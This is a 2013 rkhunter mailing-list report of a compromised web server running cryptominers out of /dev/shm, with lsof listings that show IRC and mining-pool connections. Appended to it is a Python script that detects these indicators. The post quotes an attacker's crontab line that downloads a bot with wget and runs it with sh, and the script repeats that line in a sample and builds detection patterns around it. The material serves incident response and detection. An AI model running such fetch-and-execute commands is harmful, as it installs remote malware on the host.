[Rkhunter-users] jhPrimeminer bot
From: Brent C. <bre...@gm...> - 2013-11-05 07:42:21
Good day. I can't seem to find where to submit potential problems to rkhunter, so hopefully the powers that be are listening and will take into consideration what I found.

This morning, on one of the servers we manage, when we ran top we saw the two following processes.

 5482 www-data  20   0  149m  44m 2368 S  750  0.6 228:25.51 jhprimeminer
 5513 www-data  20   0  240m 4812 1176 S    8  0.1   1:33.89 minerd

Doing an lsof on the pid we get:

root@withheld-web01 /dev # lsof -p 5482
COMMAND    PID     USER  FD  TYPE    DEVICE SIZE/OFF      NODE NAME
jhprimemi 5482 www-data cwd  DIR      0,16      160 112483832 /dev/shm/jhPrimeminer-master
jhprimemi 5482 www-data rtd  DIR     253,0     4096         2 /
jhprimemi 5482 www-data txt  REG      0,16   214680 112484110 /dev/shm/jhPrimeminer-master/jhprimeminer
jhprimemi 5482 www-data mem  REG     253,0    80712    134494 /lib/libresolv-2.11.3.so
jhprimemi 5482 www-data mem  REG     253,0    22928    131398 /lib/libnss_dns-2.11.3.so
jhprimemi 5482 www-data mem  REG     253,0    51728    131139 /lib/libnss_files-2.11.3.so
jhprimemi 5482 www-data mem  REG     253,2    93936    394581 /usr/lib/libz.so.1.2.3.4
jhprimemi 5482 www-data mem  REG     253,0    14696    131151 /lib/libdl-2.11.3.so
jhprimemi 5482 www-data mem  REG     253,0  1437064    134496 /lib/libc-2.11.3.so
jhprimemi 5482 www-data mem  REG     253,0   131258    131411 /lib/libpthread-2.11.3.so
jhprimemi 5482 www-data mem  REG     253,0    90504    131467 /lib/libgcc_s.so.1
jhprimemi 5482 www-data mem  REG     253,0   530736    131165 /lib/libm-2.11.3.so
jhprimemi 5482 www-data mem  REG     253,2  1043976    393286 /usr/lib/libstdc++.so.6.0.13
jhprimemi 5482 www-data mem  REG     253,0    31744    131137 /lib/librt-2.11.3.so
jhprimemi 5482 www-data mem  REG     253,2   356608    393543 /usr/lib/libssl.so.0.9.8
jhprimemi 5482 www-data mem  REG     253,2  1693344    393542 /usr/lib/libcrypto.so.0.9.8
jhprimemi 5482 www-data mem  REG      0,16    35911 112457085 /dev/shm/lib/libgmpxx.so.4.3.2
jhprimemi 5482 www-data mem  REG      0,16   531179 112457045 /dev/shm/lib/libgmp.so.10.1.2
jhprimemi 5482 www-data mem  REG     253,0   128744    131416 /lib/ld-2.11.3.so
jhprimemi 5482 www-data   0r CHR       1,3      0t0      1180 /dev/null
jhprimemi 5482 www-data   1w CHR       1,3      0t0      1180 /dev/null
jhprimemi 5482 www-data   2w FIFO      0,8      0t0 112228026 pipe
jhprimemi 5482 www-data   3r REG     253,2  5814328    398692 /usr/lib/cgi-bin/php5
jhprimemi 5482 www-data   4u REG     253,3        0        57 /tmp/.z
jhprimemi 5482 www-data   5u sock     0,6      0t0 112396829 can't identify protocol
jhprimemi 5482 www-data   6u sock     0,6      0t0 112523621 can't identify protocol
jhprimemi 5482 www-data   7u sock     0,6      0t0 112527946 can't identify protocol
jhprimemi 5482 www-data   8u sock     0,6      0t0 112537877 can't identify protocol
jhprimemi 5482 www-data   9u sock     0,6      0t0 112547857 can't identify protocol
jhprimemi 5482 www-data  10u sock     0,6      0t0 113824599 can't identify protocol
jhprimemi 5482 www-data  11u IPv4 114777055      0t0       TCP WITHHELD:39120->mta5.girltang.com:ircd (ESTABLISHED)   < ---- SEE HERE
jhprimemi 5482 www-data  12u IPv4 115198218      0t0       TCP WITHHELD:43904->ypool.net:10034 (ESTABLISHED)          < ---- SEE HERE
jhprimemi 5482 www-data  23w REG     253,4      373   1180063 /var/log/newrelic/php_agent.log
jhprimemi 5482 www-data  26u unix 0xffff88014727e900 0t0 111962415 socket

root@withheld-web01 /dev # lsof -p 5513
COMMAND    PID     USER  FD  TYPE    DEVICE SIZE/OFF      NODE NAME
minerd    5513 www-data cwd  DIR      0,16      340      4738 /dev/shm
minerd    5513 www-data rtd  DIR     253,0     4096         2 /
minerd    5513 www-data txt  REG      0,16   592464 114161054 /dev/shm/minerd
minerd    5513 www-data mem  REG     253,0    80712    134494 /lib/libresolv-2.11.3.so
minerd    5513 www-data mem  REG     253,0    22928    131398 /lib/libnss_dns-2.11.3.so
minerd    5513 www-data mem  REG     253,0    51728    131139 /lib/libnss_files-2.11.3.so
minerd    5513 www-data mem  REG     253,0  1437064    134496 /lib/libc-2.11.3.so
minerd    5513 www-data mem  REG     253,0   131258    131411 /lib/libpthread-2.11.3.so
minerd    5513 www-data mem  REG     253,0    31744    131137 /lib/librt-2.11.3.so
minerd    5513 www-data mem  REG     253,0   128744    131416 /lib/ld-2.11.3.so
minerd    5513 www-data   0r CHR       1,3      0t0      1180 /dev/null
minerd    5513 www-data   1w CHR       1,3      0t0      1180 /dev/null
minerd    5513 www-data   2w FIFO      0,8      0t0 112228026 pipe
minerd    5513 www-data   3r REG     253,2  5814328    398692 /usr/lib/cgi-bin/php5
minerd    5513 www-data   4u REG     253,3        0        57 /tmp/.z
minerd    5513 www-data   5u sock     0,6      0t0 112396829 can't identify protocol
minerd    5513 www-data   6u sock     0,6      0t0 112523621 can't identify protocol
minerd    5513 www-data   7u sock     0,6      0t0 112527946 can't identify protocol
minerd    5513 www-data   8u sock     0,6      0t0 112537877 can't identify protocol
minerd    5513 www-data   9u sock     0,6      0t0 112547857 can't identify protocol
minerd    5513 www-data  10u sock     0,6      0t0 113824599 can't identify protocol
minerd    5513 www-data  11u IPv4 114777055      0t0       TCP WITHHELD:39120->mta5.girltang.com:ircd (ESTABLISHED)
minerd    5513 www-data  12u IPv4 115358897      0t0       TCP WITHHELD:48657->stratum01.hashco.ws:8888 (ESTABLISHED)
minerd    5513 www-data  23w REG     253,4      373   1180063 /var/log/newrelic/php_agent.log
minerd    5513 www-data  26u unix 0xffff88014727e900 0t0 111962415 socket

Doing a clamscan it did not find anything.

Doing an ls in /dev/shm/jhPrimeminer-master and /dev/shm/minerd:

root@withheld-web01 /dev # ls -la /dev/shm/jhPrimeminer-master
total 236K
drwxr-xr-x  3 www-data www-data  160 Nov  3 21:07 .
drwxrwxrwt 10 root     root      340 Nov  4 23:24 ..
-rw-r--r--  1 www-data www-data 2.6K Sep 17 08:22 .gitignore
-rwxr-xr-x  1 www-data www-data 210K Nov  3 21:07 jhprimeminer
-rw-r--r--  1 www-data www-data 1.6K Sep 17 08:22 jhprimeminer.example.conf
-rw-r--r--  1 www-data www-data 2.0K Nov  2 07:05 Makefile
-rw-r--r--  1 www-data www-data  714 Sep 17 08:22 README.md
drwxr-xr-x  3 www-data www-data  100 Sep 17 08:22 src

root@withheld-web01 /dev # ls -la /dev/shm/minerd
-rwxr-xr-x 1 www-data www-data 579K Jul 10 15:55 /dev/shm/minerd

Looking at /dev/shm/jhPrimeminer-master/README.md shows this is the code / project:
https://github.com/tandyuk/jhPrimeminer.git

Hopefully this helps the project or someone else out there. Sigh, now to explain to the client.

Regards,
Brent

P.S. I just saw in cron:

cat /var/spool/cron/crontabs/www-data
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/cron installed on Sun Nov 3 15:21:02 2013)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
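The indicators in the post above (a binary executed by the web user out of /dev/shm, libraries mapped from /dev/shm, an inherited file descriptor on the CGI interpreter, an established connection to an IRC port and to mining-pool ports, and a crontab installed from /tmp that fetches a script and pipes it to sh) can be checked mechanically. The following is an added example, not rkhunter's code or anything from the thread: a small triage script that parses `lsof -p` output and a crontab and returns findings. The sample lsof and crontab text embedded in it is constructed to resemble the listings in the post (the local address, the download URL and the port list are placeholders or assumptions, not taken from any real host).

```python
"""Triage checks for the pattern reported above: miner binaries run by the
web user out of tmpfs, an IRC control connection, and a cron entry that
re-downloads the bot. Added example, not rkhunter's own code."""
import re

# Directories a web worker should never execute from or map libraries from.
SUSPECT_EXEC_DIRS = ("/dev/shm/", "/tmp/", "/var/tmp/")
# Remote ports seen in the post: lsof renders 6667 as "ircd" via /etc/services;
# 10034 and 8888 are the two pool ports. The rest of the set is an assumption.
SUSPECT_REMOTE_PORTS = {"ircd", "6667", "6668", "6669", "10034", "8888"}

# COMMAND PID USER FD TYPE ... ; NAME may contain spaces, so it stays in "rest".
LSOF_ROW = re.compile(
    r"^(?P<cmd>\S+)\s+(?P<pid>\d+)\s+(?P<user>\S+)\s+(?P<fd>\S+)\s+(?P<type>\S+)\s+(?P<rest>.*)$")
TCP_CONN = re.compile(
    r"TCP\s+(?P<local>\S+)->(?P<rhost>[^:\s]+):(?P<rport>\S+)\s+\((?P<state>\w+)\)")
# "download something, then hand it to a shell" inside one cron command.
FETCH_AND_RUN = re.compile(r"\b(wget|curl)\b.*\b(sh|bash)\b")
INSTALLED_FROM = re.compile(r"^#\s*\((?P<src>/(?:tmp|dev/shm|var/tmp)/\S*) installed on")


def parse_lsof(text):
    """Split `lsof -p` output into one dict per row (header row is skipped)."""
    rows = []
    for line in text.splitlines():
        m = LSOF_ROW.match(line)
        if m and not line.startswith("COMMAND"):
            rows.append(m.groupdict())
    return rows


def audit_lsof(text):
    """Return (pid, cmd, category, detail) tuples for suspicious rows."""
    findings = []
    for r in parse_lsof(text):
        pid, cmd, fd, rest = r["pid"], r["cmd"], r["fd"], r["rest"]
        if fd in ("cwd", "txt", "mem"):
            path = rest.split()[-1]
            if path.startswith(SUSPECT_EXEC_DIRS):
                cat = "exec-from-tmpfs" if fd == "txt" else "tmpfs-mapping"
                findings.append((pid, cmd, cat, f"{fd} {path}"))
        elif r["type"] == "REG" and "/cgi-bin/" in rest:
            # A numeric fd still open on the CGI interpreter was inherited from the
            # parent that spawned this process: heuristic pointer at the web stack.
            findings.append((pid, cmd, "inherited-web-fd", f"{fd} {rest.split()[-1]}"))
        m = TCP_CONN.search(rest)
        if m and m.group("rport") in SUSPECT_REMOTE_PORTS:
            findings.append((pid, cmd, "suspect-connection",
                             f"{m.group('state')} {m.group('rhost')}:{m.group('rport')}"))
    return findings


def audit_crontab(text):
    """Return (line_no, category, detail) for fetch-and-run jobs and tmp-installed crontabs."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = INSTALLED_FROM.match(line)
        if m:
            findings.append((n, "installed-from-tmp", m.group("src")))
        if not line.startswith("#") and FETCH_AND_RUN.search(line):
            findings.append((n, "fetch-and-run", line.strip()))
    return findings


# Constructed sample, trimmed and shaped after the lsof listing in the post;
# 10.0.0.5 is a placeholder for the withheld local address.
SAMPLE_LSOF = """\
COMMAND    PID     USER  FD  TYPE    DEVICE SIZE/OFF      NODE NAME
jhprimemi 5482 www-data cwd  DIR      0,16      160 112483832 /dev/shm/jhPrimeminer-master
jhprimemi 5482 www-data txt  REG      0,16   214680 112484110 /dev/shm/jhPrimeminer-master/jhprimeminer
jhprimemi 5482 www-data mem  REG     253,0  1437064    134496 /lib/libc-2.11.3.so
jhprimemi 5482 www-data mem  REG      0,16   531179 112457045 /dev/shm/lib/libgmp.so.10.1.2
jhprimemi 5482 www-data   3r REG     253,2  5814328    398692 /usr/lib/cgi-bin/php5
jhprimemi 5482 www-data   5u sock     0,6      0t0 112396829 can't identify protocol
jhprimemi 5482 www-data  11u IPv4 114777055      0t0       TCP 10.0.0.5:39120->mta5.girltang.com:ircd (ESTABLISHED)
jhprimemi 5482 www-data  12u IPv4 115198218      0t0       TCP 10.0.0.5:43904->ypool.net:10034 (ESTABLISHED)
jhprimemi 5482 www-data  23w REG     253,4      373   1180063 /var/log/newrelic/php_agent.log
"""

# Constructed sample crontab; the URL is a placeholder, not the one in the post.
SAMPLE_CRONTAB = """\
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/cron installed on Sun Nov 3 15:21:02 2013)
@weekly wget http://example.invalid/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
0 3 * * * /usr/local/bin/rotate-cache.sh
"""

if __name__ == "__main__":
    for f in audit_lsof(SAMPLE_LSOF):
        print("lsof   ", *f)
    for f in audit_crontab(SAMPLE_CRONTAB):
        print("crontab", *f)
```

On a live box, feed it `lsof -p <pid>` (or `lsof -nP` for everything, in which case ports come out numeric and "ircd" should be dropped from the set) and `crontab -u www-data -l`. The inherited-fd check is only a hint: it tells you the parent still had the CGI binary open when it forked, which is consistent with a web shell or an exploited PHP script, but it does not tell you which one.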